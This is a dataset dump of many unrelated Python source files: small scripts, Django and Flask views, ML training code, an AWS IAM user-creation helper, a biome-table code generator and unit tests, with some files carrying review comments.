text stringlengths 8 6.05M |
|---|
#!/usr/bin/python
def main():
    # Python 2 script: read two HH:MM:SS timestamps (current time, then
    # explosion time) and print the time remaining until the explosion.
    # reversed() so index 0 is seconds, 1 is minutes, 2 is hours.
    current = map(int, reversed(raw_input().split(':')))
    explosion = map(int, reversed(raw_input().split(':')))
    carry = 0  # borrow propagated from the less-significant unit
    result = []
    # Subtract unit by unit with borrow; the moduli are 60 s, 60 min, 24 h.
    for c0, c1, c2 in zip(current, explosion, [60, 60, 24]):
        r = c1 - c0 - carry
        if r < 0:
            r += c2
            carry = 1
        else:
            carry = 0
        result.append(r)
    # By convention a zero difference means the explosion is a full day away.
    if 0 == result[2] and 0 == result[1] and 0 == result[0]:
        result = [0, 0, 24]
    # result is [seconds, minutes, hours]; print back as HH:MM:SS.
    print '{:02}:{:02}:{:02}'.format(result[2], result[1], result[0])

if '__main__' == __name__:
    main()
|
import requests

# Download an image and print the raw payload.
# Bug fix: the response is a binary JPEG, so the correct accessor is
# .content (bytes); .text decodes the bytes as text and corrupts them.
response = requests.get('http://img.ivsky.com/img/tupian/pre/202003/11/bianjing_muyangquan-008.jpg')
response.raise_for_status()  # fail loudly on HTTP errors instead of printing an error page
print(response.content)
import random
import argparse

# Bounding box (integer degrees) for the synthetic grid and user data.
# Fixes: the original --min_lon help text wrongly said "max_lan", and the
# arguments were optional even though a missing value crashed later inside
# range(None) -- they are now declared required so argparse reports the
# error up front.
parser = argparse.ArgumentParser(description='Process coordinates.')
parser.add_argument('--min_lon', metavar='N', type=int, required=True,
                    help='min_lon is required')
parser.add_argument('--max_lon', metavar='N', type=int, required=True,
                    help='max_lon is required')
parser.add_argument('--min_lan', metavar='N', type=int, required=True,
                    help='min_lan is required')
parser.add_argument('--max_lan', metavar='N', type=int, required=True,
                    help='max_lan is required')
args = parser.parse_args()
def generate_grid(min_lon, max_lon, min_lan, max_lan):
    """Write one "lon,lat,value" line per integer grid cell in the half-open
    box [min_lon, max_lon) x [min_lan, max_lan) to grid.txt.

    The value is uniform random in [2.0, 30.0).  Fix: the file is now opened
    with a `with` statement -- the original never closed the handle, risking
    lost buffered data.
    """
    with open("./src/main/resources/grid.txt", "w") as grid_file:
        for x in range(min_lon, max_lon):
            for y in range(min_lan, max_lan):
                grid_file.write(f'{x},{y},{random.uniform(2.0, 30.0)}\n')
def generate_user(min_lon, max_lon, min_lan, max_lan):
    """Write 999999 synthetic users as "id,lon,lat" lines to user_labels.txt,
    with coordinates uniform in the bounding box, rounded to 4 decimals.

    Fix: the file is now closed via `with` (the original leaked the handle).
    """
    with open("./src/main/resources/user_labels.txt", "w") as user_file:
        for user_id in range(1, 1000000):
            lon = round(random.uniform(min_lon, max_lon), 4)
            lat = round(random.uniform(min_lan, max_lan), 4)
            user_file.write(f'{user_id},{lon},{lat}\n')
if __name__ == '__main__':
    # Generate both output files from the CLI-supplied bounding box.
    generate_grid(args.min_lon, args.max_lon, args.min_lan, args.max_lan)
    generate_user(args.min_lon, args.max_lon, args.min_lan, args.max_lan)
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
import pdb
from django.shortcuts import render
from django.views.generic import ListView, DetailView
from movie_tracker.models import *
from django.core.paginator import Paginator
class Index(ListView):
    """Paginated actor listing, filterable by (partial) name via ?actor=."""
    model = Actor
    template_name = 'actors/index.html'
    context_object_name = 'actors'
    paginate_by = 10

    def get_queryset(self):
        # Case-insensitive substring match; an empty query returns all actors.
        name = self.request.GET.get('actor','')
        return self.model.objects.filter(name__icontains=name)
class Show(DetailView):
    """Detail page for a single actor (looked up by pk/slug by DetailView)."""
    model = Actor
    template_name = 'actors/show.html'
    context_object_name = 'actor'
|
# USAGE
# python index_images.py --images ..\..\datasets\caltech101 --tree vptree.pickle --hashes hashes.pickle
from pyimagesearch.parallel_hashing import *
from imutils import paths
import argparse
import pickle
import vptree
import cv2
# construct argument parser and parse the arguments
ap = argparse.ArgumentParser()
ap.add_argument('-i', '--images', required=True, type=str, help='Path to input directory of images')
ap.add_argument('-t', '--tree', required=True, type=str, help='Path to output VP-tree')
# fixed help text: --hashes is an output pickle file, not a directory
ap.add_argument('-a', '--hashes', required=True, type=str, help='Path to output hashes file')
args = vars(ap.parse_args())

# Grab the paths to the input images; hashes maps hash -> list of image paths
image_paths = list(paths.list_images(args['images']))
hashes = {}

# loop over the image paths, hashing each image
for i, image_path in enumerate(image_paths):
    if (i + 1) % 100 == 0:
        print(f'[INFO] processing images {i + 1}/{len(image_paths)}...')
    image = cv2.imread(image_path)
    if image is None:
        # unreadable/corrupt file: cv2.imread returns None -- skip instead
        # of crashing inside dhash()
        print(f'[WARN] could not read {image_path}, skipping')
        continue
    # compute the perceptual hash and fold the path into the dictionary
    h = convert_hash(dhash(image))
    hashes.setdefault(h, []).append(image_path)

# build the VP-tree over the distinct hashes using Hamming distance
print('[INFO] building VP-Tree...')
tree = vptree.VPTree(list(hashes.keys()), hamming)

# serialize the VP-tree to disk (`with` closes the files even on error)
print('[INFO] serializing VP-Tree...')
with open(args['tree'], 'wb') as f:
    pickle.dump(tree, f)

# serialize the hashes dictionary to disk
print('[INFO] serializing hashes...')
with open(args['hashes'], 'wb') as f:
    pickle.dump(hashes, f)
"""A WebSocket handler for Treadmill state.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import logging
import os
from treadmill import schema
from treadmill.websocket import _utils
from treadmill import yamlwrapper as yaml
_LOGGER = logging.getLogger(__name__)
class RunningAPI(object):
    """Handler for /running topic.
    """

    def __init__(self):
        # subscribe/on_event are built as closures and bound as instance
        # attributes; `subscribe` is validated against the websocket state
        # message schema by the project decorator.
        @schema.schema({'$ref': 'websocket/state.json#/message'})
        def subscribe(message):
            """Return filter based on message payload.
            """
            parsed_filter = _utils.parse_message_filter(message['filter'])
            return [('/running', parsed_filter.filter)]

        def on_event(filename, _operation, content):
            """Event handler.
            """
            # Ignore events that do not belong to the /running tree
            # (returns None, i.e. no message is emitted).
            if not filename.startswith('/running/'):
                return
            appname = os.path.basename(filename)
            # `content` is the host the app is running on.
            return {
                'topic': '/running',
                'name': appname,
                'host': content,
            }

        self.subscribe = subscribe
        self.on_event = on_event
class ScheduledAPI(object):
    """Handler for /scheduled topic.
    """

    def __init__(self):
        # Mirrors RunningAPI: closures bound as instance attributes, with
        # schema validation on the subscribe payload.
        @schema.schema({'$ref': 'websocket/state.json#/message'})
        def subscribe(message):
            """Return filter based on message payload.
            """
            parsed_filter = _utils.parse_message_filter(message['filter'])
            return [('/scheduled', parsed_filter.filter)]

        def on_event(filename, _operation, content):
            """Event handler.
            """
            # Ignore events outside the /scheduled tree.
            if not filename.startswith('/scheduled/'):
                return
            appname = os.path.basename(filename)
            # `content` is the YAML manifest text; empty/None content (e.g.
            # on delete) yields manifest=None.
            manifest = None
            if content:
                manifest = yaml.load(content)
            return {
                'topic': '/scheduled',
                'name': appname,
                'manifest': manifest,
            }

        self.subscribe = subscribe
        self.on_event = on_event
def init():
    """API module init.

    Returns the handler table: (topic, handler instance, extra args) triples.
    """
    handlers = [
        ('/running', RunningAPI()),
        ('/scheduled', ScheduledAPI()),
    ]
    return [(topic, api, []) for topic, api in handlers]
|
from flask import Flask, render_template, redirect, request, session, flash
import re
import datetime

app = Flask(__name__)
# NOTE(review): hard-coded secret key -- acceptable for a class exercise,
# but load a random value from the environment in production.
app.secret_key = "secret"
# Basic email shape check: local-part@domain.tld
email_regex = re.compile(r'^[a-zA-Z0-9.+_-]+@[a-zA-Z0-9._-]+\.[a-zA-Z]+$')
@app.route("/")
def root():
    """Render the registration form, passing today's date (as a
    [year, month, day] string list) so the template can cap the birthday
    picker."""
    today = datetime.date.today()
    todayDate = str(today.year) + "-" + str(today.month) + "-" + str(today.day)
    todayList = todayDate.split("-")
    session["maxday"] = todayList
    # Bug fix: the value was stored under "maxday" but read back as
    # session["max"], which raised KeyError on every request.
    return render_template("index.html", maxday=session["maxday"])
@app.route("/process", methods=["POST"])
def process():
    """Validate the registration form.

    Each field group (email, name, password, birthday) is validated
    independently; every group that passes is stored in the session and
    echoed back to the template so the user does not have to retype it,
    while invalid groups flash an error message instead.

    This replaces the original 16-branch if/elif ladder (which also crashed
    with KeyError when every group failed, and contained a duplicated
    branch): the template context is simply built from the groups that
    validated.
    """
    form = request.form
    # Entirely empty submission: bounce back to the form.
    if (len(form["email"]) < 1 and len(form["fName"]) < 1 and len(form["lName"]) < 1
            and len(form["bday"]) < 1 and len(form["pword"]) < 1 and len(form["confirm"]) < 1):
        flash("Please fill out the form.")
        return redirect("/")

    # Template context: only the fields that validated are passed back.
    context = {}

    # --- email ---
    if len(form["email"]) < 1:
        flash("Email cannot be blank!")
    elif not email_regex.match(form["email"]):
        flash("Invalid email address!")
    else:
        session["email"] = form["email"]
        context["email"] = session["email"]

    # --- name ---
    if len(form["fName"]) < 1 or len(form["lName"]) < 1:
        flash("Name cannot be blank!")
    elif not form["fName"].isalpha() or not form["lName"].isalpha():
        flash("Names must not contain numbers.")
    else:
        session["fName"] = form["fName"]
        session["lName"] = form["lName"]
        context["fName"] = session["fName"]
        context["lName"] = session["lName"]

    # --- password ---
    if len(form["pword"]) < 8:
        flash("Password must be more than 8 characters.")
    elif form["pword"].islower():
        flash("Password must contain at least 1 uppercase letter.")
    elif form["pword"].isalpha():
        flash("Password must contain at least one number.")
    elif form["pword"] != form["confirm"]:
        flash("Password and password confirmation must match.")
    else:
        session["pword"] = form["pword"]
        session["confirm"] = form["confirm"]
        context["pword"] = session["pword"]
        context["confirm"] = session["confirm"]

    # --- birthday ---
    if len(form["bday"]) < 1:
        flash("Must enter a birthdate.")
    # NOTE(review): session["maxday"] is a [year, month, day] list while
    # form["bday"] is a "YYYY-MM-DD" string, so this comparison can never be
    # equal (same behavior as the original code).  TODO: compare real dates
    # if "must not be in the past" is the intended rule.
    elif form["bday"] != session["maxday"]:
        flash("Date must not be in the past.")
    else:
        session["bday"] = form["bday"]
        context["bday"] = session["bday"]

    return render_template("index.html", **context)

app.run(debug=True)
# Submitter: loganw1(Wang, Logan)
import re, traceback, keyword
def pnamedtuple(type_name, field_names, mutable = False, defaults = {}):
    """Build and return a namedtuple-like class named `type_name`, by
    generating Python source text for the class and exec-ing it.

    field_names may be a list of names or a single string of names separated
    by commas and/or whitespace.  `defaults` maps field name -> default
    value; `mutable` controls whether _replace mutates in place or returns a
    new object.  Raises SyntaxError for illegal type/field names or for
    default keys that are not fields.

    NOTE(review): the mutable default `defaults = {}` is a Python
    anti-pattern, but it is only read here, never mutated, so it is safe.
    """
    def show_listing(s):
        # Debugging aid: print the generated class source with line numbers.
        for line_number, text_of_line in enumerate(s.split('\n'),1):
            print(f' {line_number: >3} {text_of_line.rstrip()}')
    # put your code here
    # bind class_definition (used below) to the string constructed for the class

    def is_legal_name(s):
        # Validate a name, or a str/list of names: each must be a legal
        # Python identifier and not a keyword.  Returns True when everything
        # is legal; raises SyntaxError otherwise.
        if type(s) == str or type(s) == int or type(s) == float:
            s= str(s)
            if ',' in s:
                l= s.split(',') #splits if field_names
            else:
                l = s.split()
            for i in l:
                i=i.strip()
                if i in keyword.kwlist:
                    raise SyntaxError(f'pcollections.pnamedtuple.is_legal_name: String s: ' + s + ' is not a legal name, is Python keyword')
                else:
                    z = re.match('^[a-zA-Z][\w]*$', i)
                    if z:
                        pass
                    else:
                        raise SyntaxError(f'pcollections.pnamedtuple.is_legal_name: String s: ' + s + ' is not a legal name, must start with alphabetical character and be followed by alphanumeric or underscore characters')
            return True
        elif type(s) == list:
            # NOTE(review): in this branch `+ s` concatenates a str with a
            # list, so building the error message itself raises TypeError --
            # TODO confirm intended behavior for illegal list entries.
            for i in s:
                if i in keyword.kwlist:
                    raise SyntaxError(
                        f'pcollections.pnamedtuple.is_legal_name: String s: ' + s + ' is not a legal name, is Python keyword')
                else:
                    z = re.match('^[a-zA-Z][\w]*$', i)
                    if z:
                        pass
                    else:
                        raise SyntaxError(
                            f'pcollections.pnamedtuple.is_legal_name: String s: ' + s + ' is not a legal name, must start with alphabetical character and be followed by alphanumeric or underscore characters')
            return True
        # Unsupported type for s.
        raise SyntaxError()

    if is_legal_name(type_name): #Doesn't do anything if legal name, raises SyntaxError otherwise
        pass
    fields=[]
    if is_legal_name(field_names): #If all legal names, constructs list of fields
        if type(field_names) == str:
            if ',' in field_names:
                l= field_names.split(',') #splits if field_names
            else:
                l = field_names.split()
            for i in l:
                # NOTE(review): the membership test uses the unstripped name
                # but appends the stripped one, so duplicates that differ
                # only in surrounding spaces slip through -- TODO confirm.
                if i not in fields: #prevent dups
                    fields.append(i.strip())
        elif type(field_names) == list:
            fields = list(field_names)
    #Checking default params: every defaulted key must be a declared field.
    for key in defaults.keys():
        if key not in fields:
            raise SyntaxError(f'pcollections.pnamedtuple: key: ' + key + ' from defaults does not exist in this class"s fields: ' + str(fields))

    def gen_init(fields,defaults) ->str:
        # Generate __init__ source: one parameter per field (with any
        # defaults rendered inline) and one attribute assignment per field.
        s= "    def __init__(self, "
        for field in fields:
            if field in defaults.keys():
                s += str(field) +'=' + str(defaults[field])+', '
            else:
                s += str(field) +', '
        # Drop the trailing space (the trailing comma is legal Python).
        s = s[:-1] + '):\n'
        for field in fields:
            s+= f'        self.{field} = {field}\n'
        return s.rstrip()

    def gen_repr():
        # Generate __repr__ source: TypeName(field=value,...).
        s = "    def __repr__(self):\n"
        s+=f"        s = '{type_name}('\n"
        s+=f"        for key,value in self.__dict__.items():\n"
        s+=f"            s += str(key) + '=' + str(value) + ','\n"
        s+=f"        return s[:-1] + ')'"
        return s

    def gen_accessors(fields):
        # Generate one get_<field>() accessor per field.
        s=''
        for field in fields:
            field_getter = f'''\
    def get_{field}(self):
        return self.{field}
'''
            s+= field_getter
        return s

    def gen_get_item():
        # __getitem__ supports both an integer index (into _fields order)
        # and a field-name string; it dispatches to the get_ accessor.
        s=f'''\
    def __getitem__(self, x):
        if type(x) == int and x < len(self._fields):
            o = 'self.get_' + str(self._fields[x])+'()'
            return eval(o)
        elif type(x) == str and x in self._fields:
            o = 'self.get_' + str(x)+'()'
            return eval(o)
        else:
            raise IndexError('x: ' + str(x) + ' is either out of bounds or not an existing field')
'''
        return s

    def gen_eq():
        # __eq__: same class, same field count, field-by-field equality.
        s=f'''\
    def __eq__(self, x):
        if type(x) != type(self):
            return False
        if len(self._fields) != len(x._fields):
            return False
        for item in self._fields:
            if self.__getitem__(item) != x.__getitem__(item):
                return False
        return True
'''
        return s

    def gen_asdict():
        # _asdict: plain (non-f) string because the body contains braces.
        s = '''\
    def _asdict(self):
        return {field:self.__getitem__(field) for field in self._fields}
'''
        return s

    def gen_make():
        # _make: alternate constructor from any iterable of field values.
        s=f'''\
    def _make(iterable):
        return {type_name}(*iterable)
'''
        return s

    def gen_replace():
        # _replace: mutate in place when _mutable, otherwise build a new
        # instance with the replaced values.
        s = f'''\
    def _replace(self, **kargs):
        for item in kargs:
            if item not in self._fields:
                raise TypeError()
        if self._mutable:
            for item in kargs:
                self.__dict__[item] = kargs[item]
            return None
        else:
            d = dict()
            for k,v in self.__dict__.items():
                d[k] = v
            for item in kargs:
                d[item] = kargs[item]
            l = [value for value in d.values()]
            return {type_name}._make(l)
'''
        return s

    # def gen_setattr():
    #    s = f'''\
    # def __setattr__(self, name, value):
    #    if _mutable:
    #        self.__dict__[name] = value
    #    else:
    #        raise AttributeError('not mutable')
    #'''
    #    return s

    # Assemble the full class source from the generator helpers above.
    class_definition = f'''\
class {type_name}:
    _fields = {fields}
    _mutable = {mutable}
{gen_init(fields,defaults)}
{gen_repr()}
{gen_accessors(fields)}
{gen_get_item()}
{gen_eq()}
{gen_asdict()}
{gen_make()}
{gen_replace()}
'''

    # Debugging aid: uncomment show_listing, displays source code for the class
    # show_listing(class_definition)

    # Execute class_definition's str within name_space; followed by binding the
    # attribute source_code to the class_definition; after the try+except
    # return the created class object; if there were any syntax errors, show
    # the class and also show the error in the except clause
    name_space = dict( __name__ = f'pnamedtuple_{type_name}' )
    try:
        exec(class_definition,name_space)
        name_space[type_name].source_code = class_definition
    except (TypeError,SyntaxError):
        show_listing(class_definition)
        traceback.print_exc()
    return name_space[type_name]
if __name__ == '__main__':
    # Test simple pnamedtuple below in script: Point=pnamedtuple('Point','x,y')
    #TODO REMOVE BELOW
    #driver tests
    # `driver` is the course-provided interactive test driver (project-local).
    import driver
    driver.default_file_name = 'bscp3W21.txt'
    # driver.default_show_exception_message= True
    # driver.default_show_traceback= True
    driver.driver()
|
def fib(x):
    """Return the x-th Fibonacci number with the convention
    fib(0) == fib(1) == 1.

    :param x: assume x an int >= 0
    :return: Fibonacci of x
    """
    assert type(x)==int and x >=0
    # Iterative instead of the original naive double recursion, which is
    # exponential in x; same values, O(x) time, O(1) space.
    a, b = 1, 1
    for _ in range(x):
        a, b = b, a + b
    return a

# Python 3 print call (the original used the Python 2 print statement).
print(fib(11))
import numpy as np
import tensorflow as tf
from tensorflow.keras.models import Sequential
from tensorflow.keras.layers import Dense
from tensorflow.keras.layers import LSTM
#wholeSequence = [[0,0,0,0,0,0,0,0,0,2,1],
# [0,0,0,0,0,0,0,0,2,1,0],
# [0,0,0,0,0,0,0,2,1,0,0],
# [0,0,0,0,0,0,2,1,0,0,0],
# [0,0,0,0,0,2,1,0,0,0,0],
# [0,0,0,0,2,1,0,0,0,0,0],
# [0,0,0,2,1,0,0,0,0,0,0],
# [0,0,2,1,0,0,0,0,0,0,0],
# [0,2,1,0,0,0,0,0,0,0,0],
# [2,1,0,0,0,0,0,0,0,0,0]]
#
## Input sequence
#data = [[0,0,0,0,0,0,0,0,0,2,1],
# [0,0,0,0,0,0,0,0,2,1,0],
# [0,0,0,0,0,0,0,2,1,0,0],
# [0,0,0,0,0,0,2,1,0,0,0],
# [0,0,0,0,0,2,1,0,0,0,0],
# [0,0,0,0,2,1,0,0,0,0,0],
# [0,0,0,2,1,0,0,0,0,0,0],
# [0,0,2,1,0,0,0,0,0,0,0],
# [0,2,1,0,0,0,0,0,0,0,0]]
#
#target = [[0,0,0,0,0,0,0,0,2,1,0],
# [0,0,0,0,0,0,0,2,1,0,0],
# [0,0,0,0,0,0,2,1,0,0,0],
# [0,0,0,0,0,2,1,0,0,0,0],
# [0,0,0,0,2,1,0,0,0,0,0],
# [0,0,0,2,1,0,0,0,0,0,0],
# [0,0,2,1,0,0,0,0,0,0,0],
# [0,2,1,0,0,0,0,0,0,0,0],
# [2,1,0,0,0,0,0,0,0,0,0]]
#
### Preprocess Data:
#data = np.array(data, dtype=np.float32) # Convert to NP array.
#target = np.array(target, dtype=np.float32) # Convert to NP array.
#
#wholeSequence = np.array(wholeSequence, dtype=np.float32) # Convert to NP array.
#data = wholeSequence[:-1] # all but last
#target = wholeSequence[1:] # all but first
model = None
#data = wholeSequence[:-1] # all but last
#target = wholeSequence[1:] # all but first
def train(data, target = None):
    """Train the global LSTM model, or run inference when `target` is None.

    data/target: 2-D nested sequences (rows x columns); both are reshaped
    into a single batch of shape (1, rows, cols).  The model is built lazily
    on the first call and reused afterwards.  Returns the rounded absolute
    predictions in inference mode, otherwise None.
    """
    global model
    width = len(data[0])
    height = len(data)
    data = np.array(data, dtype=np.float32).reshape((1, height, width))
    if target is not None:  # idiom fix: `is not None`, not `not ... is None`
        target = np.array(target, dtype=np.float32).reshape((1, height, width))
    # Build Model (lazily, on first use)
    if model is None:  # identity check instead of `== None`
        model = Sequential()
        model.add(LSTM(width, input_shape=(height, width),
                       unroll=True, return_sequences=True))
        model.add(LSTM(1024, return_sequences=True))
        model.add(Dense(width))
        model.compile(loss='mean_absolute_error', optimizer='adam')
    if target is not None:
        # Bug fix: `nb_epoch` is the long-removed Keras 1 spelling; tf.keras
        # Model.fit expects `epochs`.
        model.fit(data, target, epochs=220, batch_size=1, verbose=2)
        return None
    predictions = model.predict(data)
    return np.rint(np.absolute(predictions))
# model.summary()
#data = [
# [0,1,0,1,0,1], [0,0,1,1,0,0], [0,0,1,1,0,0], [0,0,1,1,0,0],
# [0,0,1,1,0,0], [0,0,1,1,0,0], [0,1,1,0,0,0], [0,0,1,1,0,0],
# [0,1,1,0,0,0], [0,1,1,0,0,0], [0,1,1,0,0,0], [0,0,1,1,0,0]]
#
#target = [
# [0,1,0,1,1,1], [0,1,1,1,0,0], [0,1,1,1,0,0], [0,1,1,1,0,0],
# [0,0,1,1,0,0], [0,1,1,1,0,1], [0,0,1,1,0,1], [0,1,1,1,0,1],
# [0,1,1,1,0,1], [0,1,1,1,0,1], [0,0,1,1,0,0], [0,0,1,1,0,0]]
#
#train(data, target)
#train(target, data)
#train(data, target)
#train(target, data)
#print (train(target))
#print (train(data))
|
from aiogram import types
from aiogram.dispatcher.filters.builtin import CommandStart
from loader import dp
from keyboards.inline.test1 import test
@dp.message_handler(CommandStart())
async def bot_start(message: types.Message):
    # /start handler: greet the user by full name ("Greetings, <name>!" in
    # Russian) and attach the inline test keyboard.
    await message.answer(f"Приветствую тебя, {message.from_user.full_name}!",reply_markup=test )
|
import boto3

def create_iam(user_name, passwd):
    """
    Create an IAM user with a console password and access keys, then attach
    the EC2 full-access policy.

    Does nothing (prints "User Exists") if the user already exists.  Fix:
    the duplicate check returns instead of calling exit(0), so the function
    can be used as a library call without killing the whole process.
    """
    iam = boto3.client('iam', region_name='ap-south-1')
    # check if username already exists
    existing = [user['UserName'] for user in iam.list_users()['Users']]
    if user_name in existing:
        print("User Exists")
        return
    # creating user
    iam.create_user(
        UserName=user_name,
    )
    # console login profile; force a password reset on first login
    iam.create_login_profile(
        UserName=user_name,
        Password=passwd,
        PasswordResetRequired=True
    )
    # create the access key for the user
    response = iam.create_access_key(
        UserName=user_name
    )
    # SECURITY(review): this prints the SecretAccessKey to stdout -- kept
    # for parity with the original, but consider storing it somewhere safer.
    print(response)
    # attach the policy for the user to determine the access you want to grant
    iam.attach_user_policy(
        UserName=user_name,
        PolicyArn='arn:aws:iam::aws:policy/AmazonEC2FullAccess'
    )

create_iam('sampleuser5', '12345678')
|
# -*- coding: utf-8 -*-
import itertools
class Solution:
    def largestTriangleArea(self, points):
        """Return the largest triangle area formed by any three of `points`
        (each an [x, y] pair), using the shoelace/cross-product formula over
        every 3-combination.  Returns 0 for fewer than three points."""
        def area(p, q, r):
            (px, py), (qx, qy), (rx, ry) = p, q, r
            # Half the absolute cross product of the two edge vectors.
            return abs((px - rx) * (qy - py) - (px - qx) * (ry - py)) / 2

        return max(
            (area(*triple) for triple in itertools.combinations(points, 3)),
            default=0,
        )
if __name__ == "__main__":
    # Quick self-checks (LeetCode 812 examples).
    solution = Solution()
    assert 2 == solution.largestTriangleArea([[0, 0], [0, 1], [1, 0], [0, 2], [2, 0]])
    assert 0.5 == solution.largestTriangleArea([[1, 0], [0, 0], [0, 1]])
|
# Rutherford (2001) Examples, cross-checked results:
#
# independent measure (p. 24):
# 3 groups, 8 subjects each
## SS df MS F p
##_________________________________________________________
##A 112.0000 2 56.0000 22.6154*** .0000
##subject(A) 52.0000 21 2.4762
##_________________________________________________________
##Total 164 23
#
#
# repeated measures (p. 72):
# 8 s on 3 blocks
## SS df MS F p
##_____________________________________________________________
##A 112.0000 2 56.0000 20.6316*** .0001
##subject 14.0000 7 2.0000
##A x subject 38.0000 14 2.7143
##_____________________________________________________________
##Total 164 23
##
import numpy as np
from eelbrain import *

# Python 2 script reproducing the Rutherford (2001) ANOVA examples above.
# Dependent variable: 24 observations (3 groups of 8).
Y = Var([7, 3, 6, 6, 5, 8, 6, 7,
7, 11, 9, 11, 10, 10, 11, 11,
8, 14, 10, 11, 12, 10, 11, 12],
name='Y')
# Group factor: 8 x 'a', 8 x 'b', 8 x 'c'.
A = Factor(8*'a' + 8*'b' + 8*'c', name='A')

# Independent Measures, as mixed effects model:
# (24 distinct subjects, one observation each; subject nested in A)
subject = Factor(range(24), name='subject', random=True)
aim = test.anova(Y, A + subject(A), title="Independent Measures Full Model")
print aim

# as fixed effects model
print test.anova(Y, A, title="Independent Measures")

# Repeated Measures: the same 8 subjects measured on all 3 blocks.
subject = Factor(np.array(range(8)*3), name='subject', random=True)
arm = test.anova(Y, A * subject, title="Repeated Measures")
print arm
|
'''
URI 1075.py
Resto 2
'''
# Read N, re-prompting until it is below the guaranteed bound.
n = int(input())
while n >= 10000:
    n = int(input())

# Print every i in [1, 10000] whose remainder when divided by n equals 2.
i = 1
while i <= 10000:
    if i % n == 2:
        print(i)
    i += 1
|
import re
import json
# Default water color plus per-biome overrides (RGB as 0xRRGGBB).
default = 0x3F76E4
table = {
    'Swamp': 0x617B64,
    'River': 0x3F76E4,
    'Ocean': 0x3F76E4,
    'Lukewarm Ocean': 0x45ADF2,
    'Warm Ocean': 0x43D5EE,
    'Cold Ocean': 0x3D57D6,
    'Frozen River': 0x3938C9,
    'Frozen Ocean': 0x3938C9,
}

def parse_cpp(path):
    """Parse the gBiomes table out of a C++ source file.

    Returns a list of tuples:
    (id, name, temperature, rainfall, color1, color2, water_color),
    considering only the lines between 'Biome gBiomes[256]={' and '};'.
    """
    pattern = re.compile(r'\s*\{\s*/\*\s*(\d{1,3})\s*\*/\s*\"(.+)\",\s*([-\d\.]+)f,\s*([-\d\.]+)f,\s*(0x[\dABCDEF]{6}),\s*(0x[\dABCDEF]{6})\s*\},\s*')
    data = list()
    with open(path) as ifile:
        inside = False
        # Bug fix: the original looped `while line is not None`, but
        # readline() returns '' at EOF (never None), so a file without a
        # closing '};' line spun forever.  Iterating the file directly
        # terminates at EOF.
        for line in ifile:
            if not inside and line.startswith('Biome gBiomes[256]={'):
                inside = True
            if inside and line.startswith('};'):
                break
            if inside:
                m = pattern.match(line)
                if m is not None:
                    s = (
                        int(m.group(1)),
                        m.group(2),
                        float(m.group(3)),
                        float(m.group(4)),
                        int(m.group(5), 16),
                        int(m.group(6), 16),
                        table.get(m.group(2), default)
                    )
                    print(s)
                    data.append(s)
    return data
def gen_source(path, data):
    """Emit the generated Rust source: the BIOME_DATA constant built from
    `data` tuples (id, name, temp, rain, ..., water_color) plus the two
    embedded colormap byte constants."""
    rows = [' (/* %3d */ %-36s, %.2f, %.2f, 0x%X),\n'
            % (entry[0], '"' + entry[1] + '"', entry[2], entry[3], entry[6])
            for entry in data]
    with open(path, 'w') as ofile:
        ofile.write('// generate automatically\n')
        ofile.write("pub const BIOME_DATA: [(&'static str, f32, f32, u32); 256] = [\n")
        ofile.write(' // (name, temperature, rainfall, water_color) \n')
        ofile.writelines(rows)
        ofile.write('];\n\n')
        ofile.write("pub const COLORMAP_GRASS: &'static [u8] = include_bytes!(\"grass.png\");\n\n")
        ofile.write("pub const COLORMAP_FOLIAGE: &'static [u8] = include_bytes!(\"foliage.png\");\n\n")
if __name__ == "__main__":
    # Extract the biome table from the C++ source and emit the Rust file.
    data = parse_cpp('mc-render/biomes.cpp')
    gen_source('mc-render/src/assets/biome.rs', data)
|
import tensorflow as tf
from tensorflow.examples.tutorials.mnist import input_data
#Read in data
MNIST = input_data.read_data_sets('MNIST_data/',one_hot = True)

#specify parameters
learning_rate =0.01
batch_size = 128
n_epoch = 25

# placeholders for input images (28*28 = 784 pixels) and one-hot labels
X = tf.placeholder(tf.float32,[batch_size ,784],name = "image")
Y = tf.placeholder(tf.float32, [batch_size ,10],name = "label")

# model specification: single-layer softmax regression, logits = X @ w + b
w = tf.Variable(tf.random_normal(shape = [784,10], stddev =0.01),name = "weights")
b = tf.Variable(tf.zeros([1,10]),name = "bias")
Y_pred = tf.matmul(X,w) + b

#define the loss function: batch-mean softmax cross-entropy
entropy = tf.nn.softmax_cross_entropy_with_logits(logits=Y_pred,labels =Y)
loss = tf.reduce_mean(entropy)

#optimization
optimizer = tf.train.GradientDescentOptimizer(learning_rate = learning_rate).minimize(loss)
init = tf.global_variables_initializer()

with tf.Session() as sess:
    sess.run(init)
    # Bug fix: "/" yields a float in Python 3 and range() rejects floats --
    # use integer floor division for the batch count.
    n_batches = MNIST.train.num_examples // batch_size
    for e in range(n_epoch):
        for _ in range(n_batches):
            X_batch,Y_batch = MNIST.train.next_batch(batch_size)
            sess.run([optimizer,loss], feed_dict={X:X_batch, Y:Y_batch})
            #print (sess.run(loss,feed_dict= {X:X_batch,Y:Y_batch}))
|
from monilog import Statistics
def test_get_mean_list():
    # _get_mean_list should return the arithmetic mean of the list values.
    stats = Statistics(10)
    assert stats._get_mean_list([1, 2]) == 1.5
def test_statistics():
    # Calling a Statistics object with a list of parsed access-log records
    # must produce a printable (str) report.
    stats = Statistics(10)
    assert isinstance(stats([{
        'ip': '127.0.0.1',
        'time': '01/Mar/2020:16:50:04',
        'method': 'GET',
        'sections': ['api', 'user'],
        'section': 'api',
        'code': '304',
        'size': 33256
    }]), str)
|
import logging
import os
import tempfile
from io import BytesIO
from uuid import uuid4
import requests
import smartcrop
from PIL import Image
from fastapi import FastAPI
from opentelemetry import trace
from opentelemetry.exporter.jaeger.thrift import JaegerExporter
from opentelemetry.sdk.trace.export import BatchSpanProcessor
from starlette.responses import StreamingResponse
from trace_helper import trace_function
# Runtime configuration from the environment, with local-dev defaults.
# NOTE(review): values read from the environment come back as strings while
# the defaults for PORT/DB are ints -- confirm downstream consumers accept both.
REDIS_HOST = os.environ.get('REDIS_HOST', 'localhost')
REDIS_PORT = os.environ.get('REDIS_PORT', 6379)
REDIS_DB = os.environ.get('REDIS_DB', 0)
BUCKET_NAME = os.environ.get('BUCKET_NAME', 'awskrug-cday')
def make_key() -> str:
    """Return a short random key: the first 8 hex characters of a uuid4."""
    full_hex = uuid4().hex
    return full_hex[:8]
app = FastAPI()
# OpenTelemetry wiring: batch-export spans to a Jaeger agent (connection
# parameters come from JaegerExporter's defaults/environment).
tracer = trace.get_tracer(__name__)
exporter = JaegerExporter()
